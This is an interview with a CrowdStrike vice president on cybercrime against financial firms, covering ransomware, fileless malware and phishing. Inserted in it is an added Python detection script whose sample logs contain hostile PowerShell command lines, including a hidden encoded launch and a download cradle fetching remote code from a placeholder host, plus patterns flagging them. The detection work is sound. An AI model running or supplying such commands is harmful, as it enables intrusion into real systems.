CrowdStrike VP Q&A on cybercrime and financial services

By Alex Hammond | 25 April 2017

bobsguide's exclusive interview with Mike East, Vice President EMEA at CrowdStrike.

Who or what currently poses the greatest threat to the digital security of a financial services company?

Financial institutions remain a top target for cybercriminals. Today’s hackers - be they criminal or state-sponsored actors - target all financial organisations, regardless of size, and this can be via fast-evolving attack types such as ransomware. We’re also seeing a growth of “fileless malware”, which is much harder to track through a corporate network and significantly limits the effectiveness of traditional antivirus software. Things like PowerShell and administrative tools are being used to maintain persistence on systems to allow remote access by adversaries. Such malware resides in memory and doesn’t ever land on the hard drive.

Has this threat been constant previously and will it continue to pose the greatest issue moving forward?

Since its emergence in 2005, the ransomware threat has now morphed into a devastatingly effective weapon wielded by a vast e-crime ecosystem, targeting organisations in almost every sector.

The fact that most enterprises lack sufficient defences has attracted a more advanced breed of cybercriminal. The adversaries who develop ransomware have become so sophisticated that many of them are offering ransomware-as-a-service, giving their less knowledgeable counterparts access to the latest exploit kits and in turn widening the pool of potential victims.

Is there a method that financial services firms can employ to ascertain where the next likely attack might come from and what it will look like? Or is it a case of always having to be proactive?

Firms must be poised to assess what tools criminals are using for exploitation, understand how they have managed to propagate across the network, and then determine next steps once a presence has been established.

Enabling this kind of security posture starts with expanding the scope of operations, using technologies that can identify indicators of attack (IoAs). This enables teams to track the effects of what the adversary is trying to accomplish, so that they can understand where the adversary has been, what its objectives are, and where it is today.

Organisations need to be continually and proactively assessing their networks to understand how they are compromised. Too many are focusing on the “known” bads, rather than trying to understand the threat of the “unknown.”
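The two points above, fileless PowerShell used for persistence and indicators of attack that track adversary behaviour rather than “known bads”, meet in a behavioural detection rule. The following is an added example, not code from the interview or from CrowdStrike: the event format, field names, hostnames, timestamps and command lines are constructed for illustration (the Base64 token is simply “PLACEHOLDER” encoded, and the URL is a reserved `.invalid` name), and the indicator weights and alert threshold are assumptions a detection engineer would tune against real telemetry such as Sysmon process-creation events.

```python
"""
IoA-style scoring of PowerShell process-creation events.

Added example. The telemetry format below is constructed: one event per
line as key="value" pairs. Real sources (Sysmon Event ID 1, EDR process
events) carry the same fields under different names.
"""
import re

# Constructed sample telemetry. All four events run the same, legitimate
# powershell.exe binary (same hash), so a hash-based "known bad" list
# cannot tell them apart; only the launch context and arguments can.
SAMPLE_EVENTS = """\
ts="2017-04-25T09:01:12Z" host="fin-ws-07" parent="explorer.exe" image="powershell.exe" cmdline="powershell.exe -File C:\\Scripts\\report.ps1" sha256="aaaa1111"
ts="2017-04-25T09:03:44Z" host="fin-ws-07" parent="svchost.exe" image="powershell.exe" cmdline="powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand UExBQ0VIT0xERVI=" sha256="aaaa1111"
ts="2017-04-25T09:10:02Z" host="fin-srv-02" parent="wmiprvse.exe" image="powershell.exe" cmdline="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')" sha256="aaaa1111"
ts="2017-04-25T09:12:30Z" host="fin-srv-02" parent="taskeng.exe" image="powershell.exe" cmdline="powershell.exe -ExecutionPolicy Bypass -File C:\\Maint\\cleanup.ps1" sha256="aaaa1111"
"""

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# Parents that indicate PowerShell was started by a persistence mechanism
# (WMI event consumer, scheduled task, service) rather than by a user.
PERSISTENCE_PARENTS = {"wmiprvse.exe", "taskeng.exe", "svchost.exe"}

# (weight, description, pattern) for command-line indicators. Weights are
# assumptions for this example, not a published scoring scheme.
CMDLINE_INDICATORS = [
    (2, "hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    (3, "encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    (3, "in-memory download cradle", re.compile(r"downloadstring|invoke-expression|\biex\b", re.I)),
    (1, "profile suppressed", re.compile(r"-nop(?:rofile)?\b", re.I)),
    (1, "non-interactive", re.compile(r"-noni(?:nteractive)?\b", re.I)),
    (1, "execution policy bypass", re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.I)),
]

ALERT_THRESHOLD = 4  # assumed; tuned so a scheduled admin script stays below it


def parse_event(line):
    """Turn one key="value" line into a dict."""
    return dict(FIELD_RE.findall(line))


def score_event(event):
    """Return (score, reasons) for a single process-creation event."""
    score, reasons = 0, []
    if event.get("image", "").lower() != "powershell.exe":
        return score, reasons
    if event.get("parent", "").lower() in PERSISTENCE_PARENTS:
        score += 2
        reasons.append(f"launched by {event['parent']}")
    cmdline = event.get("cmdline", "")
    for weight, description, pattern in CMDLINE_INDICATORS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(description)
    return score, reasons


def detect(log_text, threshold=ALERT_THRESHOLD):
    """Score every event and return those at or above the threshold."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"ts": event["ts"], "host": event["host"],
                           "score": score, "reasons": reasons})
    return alerts


def distinct_hashes(log_text):
    """Hashes seen across the sample; shows why hash matching alone fails here."""
    return {parse_event(l)["sha256"] for l in log_text.splitlines() if l.strip()}


if __name__ == "__main__":
    print("binary hashes seen:", distinct_hashes(SAMPLE_EVENTS))
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']} score={alert['score']}: "
              + ", ".join(alert["reasons"]))
```

Run as is, the first and fourth events (a user-launched script and a scheduled maintenance script) stay below the threshold, while the two launched from persistence contexts with hidden, encoded or in-memory-download arguments are flagged; every event shares one hash, which is the point the interview makes about looking for the “unknown” rather than only the “known” bads.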

Can technology alone defend financial services firms against cybercriminals? Or do you have to fight human intelligence with human intelligence?

Investing in next-generation technologies may stop the more sophisticated attacks, but this is all in vain if an employee makes a mistake and gets caught by something like a phishing email. Unfortunately, it’s the easy stuff that gets companies. Whether it’s a cybercriminal or a nation state, phishing emails and social engineering are where they always start.

Being able to assess any intrusion and contain it immediately is the only way to future-proof your business. A combination of intelligence and trained personnel is critical to ensure that no matter where the bad guys move, or whatever new tactics they deploy, a business can monitor these movements and be prepared to act.

What are the latest trends that you have seen in the ways criminals are evolving their cybercrime strategies?

We are seeing tradecraft that has traditionally been adopted by the most sophisticated, well-resourced adversaries move down the food chain. This will pose a major threat to businesses as eCrime actors will be able to capitalise on advanced intrusion methods. We are already seeing this trend unfold with new-age attacks like ransomware and Mirai-based botnets that will likely continue to be easily accessible and, therefore, spread widely.

In general terms, are financial services winning the war against cybercrime? How can this be measured?

The Tesco Bank hack last year showed that even big organisations can fall victim to hackers and that when attacks are successful, it is highly likely customer funds will be stolen. The GDPR breach notification obligations will likely unveil a higher volume of hacks than we witness today, as well as more details about their impact.

More recently, financial organisations have started to undertake fire-drill exercises and stress tests. Sometimes this originates from the legal department and sometimes from the CISO, and it often comprises small quarterly drills followed by a big annual one. This results in a report which presents actionable insights into areas of strength and weakness. These processes will help determine how financial services organisations are faring.

What are CrowdStrike’s major objectives?

CrowdStrike was founded to fix a fundamental problem. The sophisticated attacks that were forcing the world’s leading businesses into the headlines could not be solved with existing malware-based defences. Co-founders George Kurtz and Dmitri Alperovitch realised that a brand-new approach was needed — one that combines the most advanced endpoint protection with expert intelligence to pinpoint the adversaries perpetrating the attacks, not just the malware. When all is said and done, CrowdStrike’s mission is simple: to stop breaches.